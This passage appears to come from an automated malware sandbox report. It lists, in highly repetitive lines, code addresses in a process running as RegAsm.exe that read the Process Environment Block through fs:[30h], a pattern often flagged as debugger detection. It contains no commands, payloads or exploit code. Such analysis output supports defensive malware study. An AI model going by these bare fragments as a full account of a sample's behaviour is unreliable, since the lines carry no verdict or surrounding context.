                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C0 mov eax, dword ptr fs:[00000030h]3_2_02EF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D0C0 mov eax, dword ptr fs:[00000030h]3_2_02F5D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D0C0 mov eax, dword ptr fs:[00000030h]3_2_02F5D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA60B8 mov eax, dword ptr fs:[00000030h]3_2_02FA60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA60B8 mov ecx, dword ptr fs:[00000030h]3_2_02FA60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F780A8 mov eax, dword ptr fs:[00000030h]3_2_02F780A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD08D mov eax, dword ptr fs:[00000030h]3_2_02EDD08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0D090 mov eax, dword ptr fs:[00000030h]3_2_02F0D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0D090 mov eax, dword ptr fs:[00000030h]3_2_02F0D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE208A mov eax, dword ptr fs:[00000030h]3_2_02EE208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1909C mov eax, dword ptr fs:[00000030h]3_2_02F1909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE5096 mov eax, dword ptr fs:[00000030h]3_2_02EE5096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0C073 mov eax, dword ptr fs:[00000030h]3_2_02F0C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D070 mov ecx, dword ptr fs:[00000030h]3_2_02F5D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6106E mov eax, dword ptr fs:[00000030h]3_2_02F6106E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5060 mov eax, dword ptr fs:[00000030h]3_2_02FB5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov ecx, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1070 mov eax, dword ptr fs:[00000030h]3_2_02EF1070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B052 mov eax, dword ptr fs:[00000030h]3_2_02F0B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8705E mov ebx, dword ptr fs:[00000030h]3_2_02F8705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8705E mov eax, dword ptr fs:[00000030h]3_2_02F8705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F66050 mov eax, dword ptr fs:[00000030h]3_2_02F66050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE2050 mov eax, dword ptr fs:[00000030h]3_2_02EE2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA903E mov eax, dword ptr fs:[00000030h]3_2_02FA903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA903E mov eax, dword ptr fs:[00000030h]3_2_02FA903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA903E mov eax, dword ptr fs:[00000030h]3_2_02FA903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA903E mov eax, dword ptr fs:[00000030h]3_2_02FA903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA020 mov eax, dword ptr fs:[00000030h]3_2_02EDA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDC020 mov eax, dword ptr fs:[00000030h]3_2_02EDC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F64000 mov ecx, dword ptr fs:[00000030h]3_2_02F64000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE016 mov eax, dword ptr fs:[00000030h]3_2_02EFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE016 mov eax, dword ptr fs:[00000030h]3_2_02EFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE016 mov eax, dword ptr fs:[00000030h]3_2_02EFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE016 mov eax, dword ptr fs:[00000030h]3_2_02EFE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F871F9 mov esi, dword ptr fs:[00000030h]3_2_02F871F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE51ED mov eax, dword ptr fs:[00000030h]3_2_02EE51ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F101F8 mov eax, dword ptr fs:[00000030h]3_2_02F101F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB61E5 mov eax, dword ptr fs:[00000030h]3_2_02FB61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F051EF mov eax, dword ptr fs:[00000030h]3_2_02F051EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1D1D0 mov eax, dword ptr fs:[00000030h]3_2_02F1D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1D1D0 mov ecx, dword ptr fs:[00000030h]3_2_02F1D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F5E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F5E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E1D0 mov ecx, dword ptr fs:[00000030h]3_2_02F5E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F5E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F5E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB51CB mov eax, dword ptr fs:[00000030h]3_2_02FB51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA61C3 mov eax, dword ptr fs:[00000030h]3_2_02FA61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA61C3 mov eax, dword ptr fs:[00000030h]3_2_02FA61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F911A4 mov eax, dword ptr fs:[00000030h]3_2_02F911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F911A4 mov eax, dword ptr fs:[00000030h]3_2_02F911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F911A4 mov eax, dword ptr fs:[00000030h]3_2_02F911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F911A4 mov eax, dword ptr fs:[00000030h]3_2_02F911A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFB1B0 mov eax, dword ptr fs:[00000030h]3_2_02EFB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F37190 mov eax, dword ptr fs:[00000030h]3_2_02F37190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6019F mov eax, dword ptr fs:[00000030h]3_2_02F6019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6019F mov eax, dword ptr fs:[00000030h]3_2_02F6019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6019F mov eax, dword ptr fs:[00000030h]3_2_02F6019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F6019F mov eax, dword ptr fs:[00000030h]3_2_02F6019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9C188 mov eax, dword ptr fs:[00000030h]3_2_02F9C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9C188 mov eax, dword ptr fs:[00000030h]3_2_02F9C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F20185 mov eax, dword ptr fs:[00000030h]3_2_02F20185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA197 mov eax, dword ptr fs:[00000030h]3_2_02EDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA197 mov eax, dword ptr fs:[00000030h]3_2_02EDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDA197 mov eax, dword ptr fs:[00000030h]3_2_02EDA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F79179 mov eax, dword ptr fs:[00000030h]3_2_02F79179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF172 mov eax, dword ptr fs:[00000030h]3_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9148 mov eax, dword ptr fs:[00000030h]3_2_02ED9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9148 mov eax, dword ptr fs:[00000030h]3_2_02ED9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9148 mov eax, dword ptr fs:[00000030h]3_2_02ED9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED9148 mov eax, dword ptr fs:[00000030h]3_2_02ED9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB5152 mov eax, dword ptr fs:[00000030h]3_2_02FB5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F78158 mov eax, dword ptr fs:[00000030h]3_2_02F78158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F74144 mov eax, dword ptr fs:[00000030h]3_2_02F74144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F74144 mov eax, dword ptr fs:[00000030h]3_2_02F74144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F74144 mov ecx, dword ptr fs:[00000030h]3_2_02F74144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F74144 mov eax, dword ptr fs:[00000030h]3_2_02F74144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F74144 mov eax, dword ptr fs:[00000030h]3_2_02F74144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE6154 mov eax, dword ptr fs:[00000030h]3_2_02EE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE6154 mov eax, dword ptr fs:[00000030h]3_2_02EE6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDC156 mov eax, dword ptr fs:[00000030h]3_2_02EDC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE7152 mov eax, dword ptr fs:[00000030h]3_2_02EE7152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F10124 mov eax, dword ptr fs:[00000030h]3_2_02F10124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB136 mov eax, dword ptr fs:[00000030h]3_2_02EDB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB136 mov eax, dword ptr fs:[00000030h]3_2_02EDB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB136 mov eax, dword ptr fs:[00000030h]3_2_02EDB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDB136 mov eax, dword ptr fs:[00000030h]3_2_02EDB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE1131 mov eax, dword ptr fs:[00000030h]3_2_02EE1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE1131 mov eax, dword ptr fs:[00000030h]3_2_02EE1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8A118 mov ecx, dword ptr fs:[00000030h]3_2_02F8A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8A118 mov eax, dword ptr fs:[00000030h]3_2_02F8A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8A118 mov eax, dword ptr fs:[00000030h]3_2_02F8A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8A118 mov eax, dword ptr fs:[00000030h]3_2_02F8A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA0115 mov eax, dword ptr fs:[00000030h]3_2_02FA0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F5E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F5E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F5E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F5E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F606F1 mov eax, dword ptr fs:[00000030h]3_2_02F606F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F606F1 mov eax, dword ptr fs:[00000030h]3_2_02F606F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9D6F0 mov eax, dword ptr fs:[00000030h]3_2_02F9D6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0D6E0 mov eax, dword ptr fs:[00000030h]3_2_02F0D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0D6E0 mov eax, dword ptr fs:[00000030h]3_2_02F0D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F736EE mov eax, dword ptr fs:[00000030h]3_2_02F736EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F136EF mov eax, dword ptr fs:[00000030h]3_2_02F136EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEB6C0 mov eax, dword ptr fs:[00000030h]3_2_02EEB6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A6C7 mov ebx, dword ptr fs:[00000030h]3_2_02F1A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1A6C7 mov eax, dword ptr fs:[00000030h]3_2_02F1A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA16CC mov eax, dword ptr fs:[00000030h]3_2_02FA16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA16CC mov eax, dword ptr fs:[00000030h]3_2_02FA16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA16CC mov eax, dword ptr fs:[00000030h]3_2_02FA16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA16CC mov eax, dword ptr fs:[00000030h]3_2_02FA16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F6C7 mov eax, dword ptr fs:[00000030h]3_2_02F9F6C7
